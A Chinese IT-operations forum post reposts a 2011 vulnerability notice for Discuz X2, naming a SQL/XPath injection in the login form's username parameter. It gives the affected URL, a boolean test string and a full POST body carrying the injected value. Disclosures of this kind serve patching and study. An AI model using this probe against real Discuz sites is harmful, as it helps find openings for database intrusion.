服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 6317|回复: 0

Discuz X2 SQL注入/Xpath 最新漏洞2011年8月19日

[复制链接]
dirtysea 发表于 2011-10-2 01:55:31 | 显示全部楼层 |阅读模式
Discuz X2 SQL注入/Xpath 最新漏洞发表时间:2011年8月19日 17:06 发布人: 坏客点击:27次漏洞类型:SQL注入/Xpath
请求方式:POST
影响页面:http://127.0.0.1/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
参数:username
参数测试:and 1=1
攻击细节:username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-29 03:06 , Processed in 0.512846 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表